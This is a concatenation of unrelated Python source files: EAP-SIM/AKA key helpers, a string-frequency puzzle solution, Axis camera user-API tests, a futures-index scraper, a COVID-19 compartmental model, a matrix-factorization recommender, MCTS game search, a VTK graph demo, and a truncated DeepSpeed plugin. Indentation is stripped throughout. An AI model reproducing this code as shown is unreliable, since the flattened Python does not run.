params+=" 0x"+tmp
MAC=exec_calc(hmac_type,params)
dbg="Output ",MAC
logging.debug(dbg)
# Replace empty with new MAC
E.avps.pop()
E.avps.append(("AT_MAC",MAC))
tmp1=encode_EAP(E)
return
def sim_calc_a3a8(RAND,K):
# NOTE: the parameter string below is an assumption, built by analogy
# with the other *_calc_* helpers in this file.
params="0x"+RAND+" 0x"+K
dbg="Calculating SIM A3A8",params
logging.debug(dbg)
SRES,KC=exec_calc("a3a8",params)
return SRES,KC
def sim_calc_keys(Identity,KC,NONCE_MT,VERSION_LIST,SELECTED_VER):
params=Identity+" 0x"+KC+" 0x"+NONCE_MT+" 0x"+VERSION_LIST+" "+SELECTED_VER
dbg="Calculating SIM keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,MK=exec_calc("sim",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,MK
def aka_calc_milenage(OP,K,RAND):
params="0x"+OP+" 0x"+K+" 0x"+RAND
XRES,CK,IK,AK,AKS=exec_calc("milenage-f2345",params)
return XRES,CK,IK,AK,AKS
def aka_calc_keys(Identity,Ck,Ik):
params=Identity+" 0x"+Ck+" 0x"+Ik
dbg="Calculating AKA keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,MK=exec_calc("aka",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,MK
def akap_calc_keys(Identity,Ck,Ik):
params=Identity+" 0x"+Ck+" 0x"+Ik
dbg="Calculating AKA' keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,KRE=exec_calc("akaprime",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,KRE
def decrypt_data(Iv,Kencr,encr_data):
params="0x"+Iv+" 0x"+Kencr+" 0x"+encr_data
DATA=exec_calc("decode",params)
return DATA
def xor_string(s1, s2):
# truncate the result to the minimum length
trunc = min( len(s1), len(s2) )
s1, s2 = s1[:trunc], s2[:trunc]
res = ""
# xor byte per byte
for i in range(trunc):
res += chr( ord(s1[i]) ^ ord(s2[i]) )
return res
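# Example: xor_string("\x01\x02", "\x03\x03\xff") -> "\x02\x01"
# (the result is truncated to the shorter input, here 2 bytes).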
######################################################
# History
# Ver 0.2.0 - Feb 17, 2012 - EAP-Payload decoder
# Ver 0.2.1 - Feb 19, 2012 - EAP-Payload+ AKA/AKA' C calculations
# Ver 0.2.8 - May 25, 2012 - EAP functions moved to separate source
# - bugfix: added padding on encoding, field size calculation checked
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
mx= max(fs)
mi= min(fs)
if fs.count(mx) == 1 and (mx - mi == 1):
return 'YES'
elif fs.count(mi)==1 and mi==1:
return 'YES'
return 'NO'
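# A few hand-checked cases for the condition above:
#   isValid("aabbcc")   -> 'YES'  (all frequencies already equal)
#   isValid("aabbccc")  -> 'YES'  (removing one 'c' equalizes the frequencies)
#   isValid("aabbcccc") -> 'NO'   (no single removal can equalize them)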
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
|
"""Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv"
digusers="root,operator,viewer"
"""
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/20 14:52
Desc: Nanhua Futures - commodity index historical trend - price index - values
http://www.nanhua.net/nhzc/varietytrend.html
The index starts at 1000 points and is accumulated from returns
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
"""
import time
import requests
import pandas as pd
def futures_nh_index_symbol_table() -> pd.DataFrame:
"""
Nanhua Futures - list of all varieties covered by the Nanhua index
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:return: list of all varieties covered by the Nanhua index
:rtype: pandas.DataFrame
"""
url = "http://www.nanhua.net/ianalysis/plate-variety.json"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df['firstday'] = pd.to_datetime(temp_df['firstday']).dt.date
return temp_df
def futures_nh_price_index(symbol: str = "A") -> pd.DataFrame:
"""
Nanhua Futures - single-variety Nanhua index - price - full history
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:param symbol: obtained via ak.futures_nh_index_symbol_table()
:type symbol: str
:return: Nanhua Futures - single-variety Nanhua index - price - full history
:rtype: pandas.DataFrame
"""
symbol_df = futures_nh_index_symbol_table()
if symbol in symbol_df["code"].tolist():
t = time.time()
url = f"http://www.nanhua.net/ianalysis/varietyindex/price/{symbol}.json?t={int(round(t * 1000))}"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.columns = ["date", "value"]
temp_df['date'] = pd.to_datetime(temp_df["date"], unit='ms').dt.date
return temp_df
if __name__ == "__main__":
futures_nh_index_symbol_table_df = futures_nh_index_symbol_table()
print(futures_nh_index_symbol_table_df)
futures_nh_price_index_df = futures_nh_price_index(symbol="NHAI")
print(futures_nh_price_index_df)
|
"""Custom COVID19 Compartmental model
"""
from ..model import CompartmentalModel
class COVID19(CompartmentalModel):
def __init__(self,
N,
beta,
incubation_rate = 1/3.7,
recovery_rate_asymptomatic = 1/4.7,
recovery_rate_mild = 1/4.7,
symptoms_to_hospital_rate = 1/5.5,
symptoms_to_icu_rate = 1/7,
proba_severe = 0.071,
proba_asymptomatic = 0.2,
proba_icu = 0.182,
recovery_rate_hospital = 0.046,
recovery_rate_icu = 0.035,
death_rate_hospital = 0.0046,
death_rate_icu = 0.0087,
isolation_ratio = 0.25,
offset = None,
):
"""COVID19 Compartmental Model
Parameters:
Default params are set according to INSERM research paper
"""
params = {
"N":N,
"beta":beta,
"incubation_rate":incubation_rate,
"recovery_rate_asymptomatic":recovery_rate_asymptomatic,
"recovery_rate_mild":recovery_rate_mild,
"recovery_rate_hospital":recovery_rate_hospital,
"recovery_rate_icu":recovery_rate_icu,
"symptoms_to_icu_rate":symptoms_to_icu_rate,
"symptoms_to_hospital_rate":symptoms_to_hospital_rate,
"death_rate_hospital":death_rate_hospital,
"death_rate_icu":death_rate_icu,
"proba_severe":proba_severe,
"proba_asymptomatic":proba_asymptomatic,
"proba_icu":proba_icu,
"isolation_ratio":isolation_ratio,
}
# Define compartments name and number
compartments = ["S","E","Ia","Im","Is","H","ICU","D","R"]
super().__init__(compartments,offset = offset,params = params)
# Parameters
self.N = N
self.beta = self._make_beta_parameter(beta)
# Prepare transitions
transitions = {
"S":{
"E":lambda y,t : y["S"] / N * self.beta(y,t) * (y["Ia"]+ isolation_ratio * (y["Im"] + y["Is"]))
},
"E":{
"Ia":lambda y,t : incubation_rate * (proba_asymptomatic) * y["E"],
"Im":lambda y,t : incubation_rate * (1 - proba_asymptomatic - proba_severe) * y["E"],
"Is":lambda y,t : incubation_rate * (proba_severe) * y["E"],
},
"Ia":{
"R":lambda y,t : recovery_rate_asymptomatic * y["Ia"],
},
"Im":{
"R":lambda y,t : recovery_rate_mild * y["Im"],
},
"Is":{
"ICU":lambda y,t : symptoms_to_icu_rate * (proba_icu) * y["Is"],
"H":lambda y,t : symptoms_to_hospital_rate * (1-proba_icu) * y["Is"],
},
"ICU":{
"R":lambda y,t : recovery_rate_icu * y["ICU"],
"D":lambda y,t : death_rate_icu * y["ICU"],
},
"H":{
"R":lambda y,t : recovery_rate_hospital * y["H"],
"D":lambda y,t : death_rate_hospital * y["H"],
},
}
# Add transition
self.add_transitions(transitions)
def R0(self, beta):
pa = self.params["proba_asymptomatic"]
ps = self.params["proba_severe"]
proba_icu = self.params["proba_icu"]
recovery_rate_asymptomatic = self.params["recovery_rate_asymptomatic"]
recovery_rate_mild = self.params["recovery_rate_mild"]
recovery_rate_severe = (1-proba_icu) * self.params["symptoms_to_hospital_rate"] + proba_icu * self.params["symptoms_to_icu_rate"]
isolation_ratio = self.params["isolation_ratio"]
return beta * (pa / recovery_rate_asymptomatic + (isolation_ratio * (1-pa-ps) / recovery_rate_mild) + (isolation_ratio * ps / recovery_rate_severe))
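# Rough sanity check (hand arithmetic with the default parameters above):
# R0(beta) ~= beta * (0.2*4.7 + 0.25*0.729*4.7 + 0.25*0.071/0.175) ~= 1.9 * beta,
# so with these defaults the epidemic grows whenever beta exceeds roughly 0.53.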
|
from lib.utils import top_k
from TraditionalRecommenderSystems.MatrixFactorization.Models import BaseMF
import numpy as np
import pandas as pd
import torch
from torch import nn
import torch.utils.data as data
from tqdm import tqdm
class MatrixFactorization(object):
def __init__(self, user_item_pairs, user_list, item_list, nb_factor=40, drop_rate=0.5, batch_size=32, lr=1e-1,
optimizer=torch.optim.Adam, loss_func=nn.MSELoss(reduction='mean'), sparse=False,
weight_decay=0., device='cuda', pro_process=None):
"""
Matrix Factorization based on Pytorch.
:param user_item_pairs: list. [(user, item, rating)].
:param user_list: list. The list of all the users (with no repeat).
:param item_list: list. The list of all the items (with no repeat).
:param nb_factor: int. The number of factors.
:param drop_rate: float 0~1. Drop rate of the dropout layer.
:param batch_size: int. Batch size of training
:param lr: float. Learning rate.
:param optimizer: torch.optim. Optimizer utilized to train the model.
:param loss_func: torch.nn.*Loss. Loss function of training.
:param sparse: boolean. The gradient requires to be sparse or not.
:param weight_decay: float. L2 regularization.
:param device: 'cpu' or 'cuda'.
:param pro_process: nn.Module.
"""
self.user_item_pairs = pd.DataFrame(user_item_pairs)
# build index-user, index-item
self.index_2_user = np.array(user_list)
self.index_2_item = np.array(item_list)
assert len(self.index_2_user) == len(set(self.index_2_user))
assert len(self.index_2_item) == len(set(self.index_2_item))
self.user_2_index = {self.index_2_user[i]: i for i in range(len(self.index_2_user))}
self.item_2_index = {self.index_2_item[i]: i for i in range(len(self.index_2_item))}
self.nb_user, self.nb_item = len(user_list), len(item_list)
# prepare training loader
train_user_indices = torch.from_numpy(self.users_to_indices(self.user_item_pairs[0].values)).long()
train_item_indices = torch.from_numpy(self.items_to_indices(self.user_item_pairs[1].values)).long()
train_ratings = torch.from_numpy(self.user_item_pairs[2].values.reshape(-1, 1)).float()
self.train_data_loader = data.DataLoader(data.TensorDataset(train_user_indices, train_item_indices,
train_ratings), batch_size=batch_size, shuffle=True)
# build model
self.nb_factor = nb_factor
self.lr = lr
self.batch_size = batch_size
self.loss_func = loss_func
self.weight_decay = weight_decay
self.device = device
self.sparse = sparse
self.process = pro_process
self.model = BaseMF(self.nb_user, self.nb_item, nb_factor, drop_rate, sparse, pro_process=self.process).to(device)
self.optimizer = optimizer(self.model.parameters(), lr=lr, weight_decay=weight_decay)
# build history rating matrix
self.pred_rating_matrix = None
self.history_rating_matrix = None
self.update_history_rating_matrix()
def train(self, epochs, test_data=None, test_epoch_step=1):
"""
Train the model.
:param epochs: int. The epochs of training.
:param test_data: [(user, item, rating)]. None if no validation is applied.
:param test_epoch_step: int. The step of validation.
:return: (list of training loss, list of test loss); the test-loss list is empty when no validation data is given.
"""
hist_train_loss, hist_test_loss = [], []
if test_data is not None:
test_data = pd.DataFrame(test_data)
for epoch in range(epochs):
print('Epoch-{}/{}:'.format(epoch+1, epochs))
self.model.train()
train_loss = self.train_epoch()
hist_train_loss.append(train_loss)
if (test_data is not None) and (epoch % test_epoch_step == 0):
self.model.eval()
test_loss = self.eval(test_data.iloc[:, [0, 1]].values, ground_truth=test_data[2].values)
hist_test_loss.append(test_loss)
print('training loss = {}, test loss = {}'.format(train_loss, test_loss))
else:
print('training loss = {}'.format(train_loss))
self.update_pred_rating_matrix()
return hist_train_loss, hist_test_loss
def train_epoch(self):
"""
:return: training loss.
"""
self.model.train()
epoch_loss = 0.
for id_user, id_item, id_rating in tqdm(self.train_data_loader):
batch_loss = self.train_on_batch(id_user, id_item, id_rating)
epoch_loss += batch_loss
epoch_loss /= len(self.train_data_loader)
return epoch_loss
def train_on_batch(self, user_indices, item_indices, ratings):
users, items, ratings = user_indices.to(self.device), item_indices.to(self.device), ratings.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(users, items)
loss = self.loss_func(outputs, ratings)
loss.backward()
self.optimizer.step()
return loss.item()
def eval(self, user_item_pairs, ground_truth, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item).
:param ground_truth: the ground truth rating.
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
self.model.eval()
outputs = self.predict(user_item_pairs, batch_size=batch_size).ravel()
loss = np.mean((outputs-ground_truth.ravel())**2)
return loss
def predict(self, user_item_pairs, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
pairs = pd.DataFrame(user_item_pairs)
user_indices = self.users_to_indices(pairs[0].values)
item_indices = self.items_to_indices(pairs[1].values)
self.model.eval()
outputs = []
with torch.no_grad():
start_id = 0
end_id = min(batch_size, len(pairs))
while start_id < len(pairs):
outputs.append(self.predict_on_batch(user_indices[start_id:end_id], item_indices[start_id:end_id]))
start_id += batch_size
end_id = min(start_id+batch_size, len(pairs))
return np.concatenate(outputs, axis=0)
def predict_on_batch(self, user_indices, item_indices):
users = torch.from_numpy(user_indices).long().to(self.device)
items = torch.from_numpy(item_indices).long().to(self.device)
outputs = self.model(users, items)
return outputs.data.cpu().numpy()
def update_history_rating_matrix(self):
"""
Update history rating matrix.
:return: self.
"""
self.history_rating_matrix = pd.DataFrame(index=self.index_2_user, columns=self.index_2_item)
for i, j, k in self.user_item_pairs.values:
if i and j and k:
self.history_rating_matrix[j][i] = k
return self
def update_pred_rating_matrix(self):
"""
Update prediction rating matrix.
:return: self.
"""
pred_matrix = self.model.get_rating_matrix().data.cpu().numpy()
self.pred_rating_matrix = np.where(self.history_rating_matrix.isna(), pred_matrix, np.nan)
return self
# def get_single_rating(self, i, j):
# return self.pred_rating_matrix[i][j] if not np.isnan(self.pred_rating_matrix[i][j])\
# else self.history_rating_matrix.values[i][j]
#
# def predict_ratings_with_matrix(self, user_item_pairs):
# """
# Predict the ratings of the pairs of (user, item).
# :param user_item_pairs: list of (user, item)
# :return: ratings. size=[nb_pairs]
# """
# pairs = pd.DataFrame(user_item_pairs)
# users = self.users_to_indices(pairs[0])
# items = self.items_to_indices(pairs[1])
# return np.array([self.get_single_rating(users[i], items[i]) for i in range(len(user_item_pairs))])
def predict_ratings(self, user_item_pairs):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:return: ratings. size=[nb_pairs]
"""
return self.predict(user_item_pairs).ravel()
def recommend(self, users, nb_recommendation):
"""
return the recommendations and their corresponding ratings.
:param users: array of users
:param nb_recommendation: The number of items to be recommended.
:return: Indices of recommended items and their corresponding scores.
"""
user_indices = self.users_to_indices(users)
id_recommend, rating_recommend = top_k(np.where(np.isnan(self.pred_rating_matrix[user_indices, :]),
-np.inf, self.pred_rating_matrix[user_indices, :]),
k=nb_recommendation, axis=-1, reverse=True, sort=True)
return id_recommend, rating_recommend
def users_to_indices(self, users):
return np.array([self.user_2_index[user] for user in users]).ravel()
def indices_to_users(self, indices):
return self.index_2_user[np.array(indices).ravel()]
def items_to_indices(self, items):
return np.array([self.item_2_index[item] for item in items]).ravel()
def indices_to_items(self, indices):
return self.index_2_item[np.array(indices).ravel()]
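# Usage sketch (illustrative only; the toy ratings below are made up and
# device='cpu' is used so the example does not assume a GPU):
#   pairs = [('u1', 'i1', 5.0), ('u1', 'i2', 3.0), ('u2', 'i2', 4.0)]
#   mf = MatrixFactorization(pairs, user_list=['u1', 'u2'], item_list=['i1', 'i2'],
#                            nb_factor=8, batch_size=2, device='cpu')
#   train_loss, _ = mf.train(epochs=5)
#   item_indices, scores = mf.recommend(['u2'], nb_recommendation=1)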
|
import numpy as np
import copy
def softmax(x):
probs = np.exp(x - np.max(x))
probs /= np.sum(probs)
return probs
class TreeNode(object):
"""A node in the MCTS tree. Each node keeps track of its own value Q, prior probability P, and
its visit-count-adjusted prior score u.
"""
def __init__(self, parent, prior_p):
self._parent = parent
self._children = {} # a map from action to TreeNode
self._n_visits = 0
self._Q = 0
self._u = 0
self._P = prior_p
def expand(self, action_priors):
"""Expand tree by creating new children.
action_priors -- output from policy function - a list of tuples of actions
and their prior probability according to the policy function.
"""
for action, prob in action_priors:
if action not in self._children:
self._children[action] = TreeNode(self, prob)
def select(self, c_puct):
"""Select action among children that gives maximum action value, Q plus bonus u(P).
Returns:
A tuple of (action, next_node)
"""
return max(self._children.items(), key=lambda act_node: act_node[1].get_value(c_puct))
def update(self, leaf_value):
"""Update node values from leaf evaluation.
Arguments:
leaf_value -- the value of subtree evaluation from the current player's perspective.
"""
# Count visit.
self._n_visits += 1
# Update Q, a running average of values for all visits.
self._Q += 1.0*(leaf_value - self._Q) / self._n_visits
def update_recursive(self, leaf_value):
"""Like a call to update(), but applied recursively for all ancestors.
"""
# If it is not root, this node's parent should be updated first.
if self._parent:
self._parent.update_recursive(-leaf_value)
self.update(leaf_value)
def get_value(self, c_puct):
"""Calculate and return the value for this node: a combination of leaf evaluations, Q, and
this node's prior adjusted for its visit count, u
c_puct -- a number in (0, inf) controlling the relative impact of values, Q, and
prior probability, P, on this node's score.
"""
self._u = c_puct * self._P * np.sqrt(self._parent._n_visits) / (1 + self._n_visits)
return self._Q + self._u
def is_leaf(self):
"""Check if leaf node (i.e. no nodes below this have been expanded).
"""
return self._children == {}
def is_root(self):
return self._parent is None
class MCTS(object):
"""A simple implementation of Monte Carlo Tree Search.
"""
def __init__(self, policy_value_fn, c_puct=5, n_playout=10000):
"""Arguments:
policy_value_fn -- a function that takes in a board state and outputs a list of (action, probability)
tuples and also a score in [-1, 1] (i.e. the expected value of the end game score from
the current player's perspective) for the current player.
c_puct -- a number in (0, inf) that controls how quickly exploration converges to the
maximum-value policy, where a higher value means relying on the prior more
"""
self._root = TreeNode(None, 1.0)
self._policy = policy_value_fn
self._c_puct = c_puct
self._n_playout = n_playout
def _playout(self, state):
"""Run a single playout from the root to the leaf, getting a value at the leaf and
propagating it back through its parents. State is modified in-place, so a copy must be
provided.
Arguments:
state -- a copy of the state.
"""
node = self._root
while(1):
if node.is_leaf():
break
# Greedily select next move.
action, node = node.select(self._c_puct)
state.do_move(action)
# Evaluate the leaf using a network which outputs a list of (action, probability)
# tuples p and also a score v in [-1, 1] for the current player.
action_probs, leaf_value = self._policy(state)
# Check for end of game.
end, winner = state.game_end()
if not end:
node.expand(action_probs)
else:
# for end state, return the "true" leaf_value
if winner == -1: # tie
leaf_value = 0.0
else:
leaf_value = 1.0 if winner == state.get_current_player() else -1.0
# Update value and visit count of nodes in this traversal.
node.update_recursive(-leaf_value)
def get_move_probs(self, state, temp=1e-3):
"""Runs all playouts sequentially and returns the available actions and their corresponding probabilities
Arguments:
state -- the current state, including both game state and the current player.
temp -- temperature parameter in (0, 1] that controls the level of exploration
Returns:
the available actions and the corresponding probabilities
"""
for n in range(self._n_playout):
state_copy = copy.deepcopy(state)
self._playout(state_copy)
# calc the move probabilities based on the visit counts at the root node
act_visits = [(act, node._n_visits) for act, node in self._root._children.items()]
acts, visits = zip(*act_visits)
act_probs = softmax(1.0/temp * np.log(np.array(visits) + 1e-10))
return acts, act_probs
def update_with_move(self, last_move):
"""Step forward in the tree, keeping everything we already know about the subtree.
"""
if last_move in self._root._children:
self._root = self._root._children[last_move]
self._root._parent = None
else:
self._root = TreeNode(None, 1.0)
def __str__(self):
return "MCTS"
class MCTSPlayer(object):
"""AI player based on MCTS"""
def __init__(self, policy_value_function, c_puct=5, n_playout=2000, is_selfplay=0):
self.mcts = MCTS(policy_value_function, c_puct, n_playout)
self._is_selfplay = is_selfplay
def set_player_ind(self, p):
self.player = p
def reset_player(self):
self.mcts.update_with_move(-1)
def get_action(self, board, temp=1e-3, return_prob=0):
sensible_moves = board.availables
move_probs = np.zeros(board.width*board.height) # the pi vector returned by MCTS as in the alphaGo Zero paper
if len(sensible_moves) > 0:
acts, probs = self.mcts.get_move_probs(board, temp)
move_probs[list(acts)] = probs
if self._is_selfplay:
# add Dirichlet Noise for exploration (needed for self-play training)
move = np.random.choice(acts, p=0.75*probs + 0.25*np.random.dirichlet(0.3*np.ones(len(probs))))
self.mcts.update_with_move(move) # update the root node and reuse the search tree
else:
# with the default temp=1e-3, this is almost equivalent to choosing the move with the highest prob
move = np.random.choice(acts, p=probs)
# reset the root node
self.mcts.update_with_move(-1)
# location = board.move_to_location(move)
# print("AI move: %d,%d\n" % (location[0], location[1]))
if return_prob:
return move, move_probs
else:
return move
else:
print("WARNING: the board is full")
def __str__(self):
return "MCTS {}".format(self.player)
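# Usage sketch (illustrative only): policy_value_function must map a board state to
# (iterable of (action, prior_prob) pairs, value in [-1, 1]). A minimal uniform stub
# satisfying that contract, and a player built from it, could look like:
#   def uniform_policy(board):
#       p = 1.0 / len(board.availables)
#       return [(move, p) for move in board.availables], 0.0
#   player = MCTSPlayer(uniform_policy, c_puct=5, n_playout=400)
#   # move = player.get_action(board)  # board must provide availables, do_move, game_end, ...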
|
#!/usr/bin/env python
from vtk import *
source = vtkRandomGraphSource()
source.SetNumberOfVertices(15)
source.SetStartWithTree(True)
source.SetIncludeEdgeWeights(True)
bfs = vtkBoostBreadthFirstSearch()
bfs.AddInputConnection(source.GetOutputPort())
bfs.SetOriginVertex(0)
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(bfs.GetOutputPort())
view.SetVertexLabelArrayName("BFS")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("BFS")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("edge weight")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
view.SetVertexLabelFontSize(20)
theme = vtkViewTheme.CreateNeonTheme()
theme.SetLineWidth(5)
theme.SetPointSize(10)
view.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view.GetInteractor().Start()
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import json
import logging
import os
import platform
from collections import OrderedDict
from pathlib import Path
from typing import Any, Callable, Dict, Generator, List, Mapping, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.overrides.base import _LightningModuleWrapperBase
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.ddp import DDPPlugin
from pytorch_lightning.trainer.optimizers import _get_default_scheduler_config
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.apply_func import apply_to_collection
from pytorch_lightning.utilities.distributed import log, rank_zero_info, rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import _PATH, LRSchedulerTypeTuple
from pytorch_lightning.utilities.warnings import rank_zero_warn, WarningCache
warning_cache = WarningCache()
if _DEEPSPEED_AVAILABLE:
import deepspeed
def remove_module_hooks(model: torch.nn.Module) -> None:
# todo (tchaton) awaiting this feature to move upstream to DeepSpeed
for module in model.modules():
module._backward_hooks = OrderedDict()
module._is_full_backward_hook = None
module._forward_hooks = OrderedDict()
module._forward_pre_hooks = OrderedDict()
module._state_dict_hooks = OrderedDict()
module._load_state_dict_pre_hooks = OrderedDict()
class LightningDeepSpeedModule(_LightningModuleWrapperBase):
def __init__(self, pl_module: "pl.LightningModule", precision: int) -> None:
super().__init__(pl_module)
self.precision = precision
def forward(self, *inputs, **kwargs):
if self.precision == 16:
inputs = self._move_float_tensors_to_half(inputs)
return super().forward(*inputs, **kwargs)
@staticmethod
def batch_to(data):
return data.half()
def _move_float_tensors_to_half(self, batch: Any):
batch = apply_to_collection(batch, (torch.FloatTensor, torch.cuda.FloatTensor), function=self.batch_to)
return batch
class DeepSpeedPlugin(DDPPlugin):
distributed_backend = "deepspeed"
DEEPSPEED_ENV_VAR = "PL_DEEPSPEED_CONFIG_PATH"
def __init__(
self,
zero_optimization: bool = True,
stage: int = 2,
remote_device: str = "cpu",
offload_optimizer: bool = False,
offload_parameters: bool = False,
offload_params_device: str = "cpu",
nvme_path: str = "/local_nvme",
params_buffer_count: int = 5,
params_buffer_size: int = 1e8,
max_in_cpu: int = 1e9,
offload_optimizer_device: str = "cpu",
optimizer_buffer_count: int = 4,
block_size: int = 1048576,
queue_depth: int = 8,
single_submit: bool = False,
overlap_events: bool = True,
thread_count: int = 1,
pin_memory: bool = False,
sub_group_size: int = 1e12,
contiguous_gradients: bool = True,
overlap_comm: bool = True,
allgather_partitions: bool = True,
reduce_scatter: bool = True,
allgather_bucket_size: int = 2e8,
reduce_bucket_size: int = 2e8,
zero_allow_untested_optimizer: bool = True,
logging_batch_size_per_gpu: Union[str, int] = "auto",
config: Optional[Union[Path, str, dict]] = None,
logging_level: int = logging.WARN,
num_nodes: Optional[int] = None,
parallel_devices: Optional[List[torch.device]] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
loss_scale: float = 0,
initial_scale_power: int = 16,
loss_scale_window: int = 1000,
hysteresis: int = 2,
min_loss_scale: int = 1,
partition_activations: bool = False,
cpu_checkpointing: bool = False,
contiguous_memory_optimization: bool = False,
synchronize_checkpoint_boundary: bool = False,
load_full_weights: bool = False,
partition_module: bool = True,
) -> None:
"""Provides capabilities to run training using the DeepSpeed library, with training optimizations for large
billion parameter models. `For more information: https://pytorch-lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed`.
.. warning:: ``DeepSpeedPlugin`` is in beta and subject to change.
Defaults have been set to enable ZeRO-Offload and some have been taken from the link below.
These defaults have been set generally, but may require tuning for optimum performance based on your model size.
`For more information: https://www.deepspeed.ai/docs/config-json/#zero-optimizations-for-fp16-training`.
Arguments:
zero_optimization: Enable ZeRO optimization. This is only compatible with precision=16.
stage: Different stages of the ZeRO Optimizer. 0 is disabled,
1 is optimizer state partitioning, 2 is optimizer+gradient state partitioning,
3 is optimizer+gradient_parameter partitioning using the infinity engine.
